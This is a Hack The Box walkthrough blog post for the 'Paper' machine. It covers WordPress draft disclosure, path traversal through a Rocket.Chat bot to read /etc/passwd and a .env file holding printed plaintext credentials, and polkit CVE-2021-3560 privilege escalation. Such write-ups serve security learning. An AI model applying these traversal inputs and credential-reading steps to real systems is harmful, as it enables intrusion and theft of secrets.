Paper — Hackthebox Walkthrough
This was a box that I learned the importance of enumeration. Really loved the realism of the box and the exploitation chain.
User
As usual, starting with nmap gave me 3 open ports.
nmap -sV -sC 10.10.11.143
PORT STATE SERVICE REASON VERSION
22/tcp open tcpwrapped syn-ack
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open tcpwrapped syn-ack
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
443/tcp open tcpwrapped syn-ack
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/organizationalUnitName=ca-3899279223185377061/emailAddress=root@localhost.localdomainVisiting port 80 was the default Centos webpage.
Looking at the server response headers, there was a header specifying the backend server as office.paper
NOTE: “You can also find this out by using curl with -I option.”
Adding the entry to my hosts config file and visiting the domain, we see a WordPress installation.
sudo echo 10.10.11.143 office.paper >> /etc/hosts
Running wpscan against the site told me the WordPress version.
wpscan --url http://office.paper
Googling around, I found a vulnerability that lets read me saved drafts unauthenticated.
As mentioned, I was able to read a saved drafts by setting the static parameter to 1 in the URL.
http://office.paper/?static=1
The drafts tells about a new vhost which is chat.office.paper . Adding this to the hosts config file and visiting it, gives us a chat application called “Rocket chat”.
As mentioned, we need a secret registration link to register. We did get that from the draft we saw in WordPress. So we can use that to register as user.
http://chat.office.paper/register/8qozr226AhkCHZdyYAfter registering and logging in, we can see that there is a general channel which we have read access to. Looking at the chat history, we can see that there is a server bot named “recylops”.
In the chat we can see how to use the bot as well. And we see that we can list and read files through the bot.
So we can try to use the bot to list the files in the server. First we have to start a conversation with the bot.
Then with this command we can list the files in the present directory.
recyclops list .I was able to read the /etc/passwd file with this command.
recyclops file ../../../etc/passwd
We can list the files in one directory up with this.
recyclops list ..I saw a a directory as hubot which sound interesting. Listing file inside that directory, I saw .env was there.
And I was able to find some the credentials of the dwight user in /hubot/.env
recyclops file ../hubot/.env
user: dwight
pass: Queenofblad3s!23Then I sshed in as dwight with this credentials.
Root
Running linpeas as dwight right away I saw the box is vulnerable to CVE-2021–3560.
NOTE: “Make sure to run the updated linpeas, the old one won’t catch this.”
This vulnerability exploits a functionality in polkit .Googling around I found a script that automates the process of exploitation.
With this script, I was able to add a new user with sudo privileges. Ran the script as follows which added a new user named test with the password of test
./k.sh -u=test -p=test
Then I logged in as test and then used sudo su to get a root shell.
Rooted!
Contact me though social media:
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄
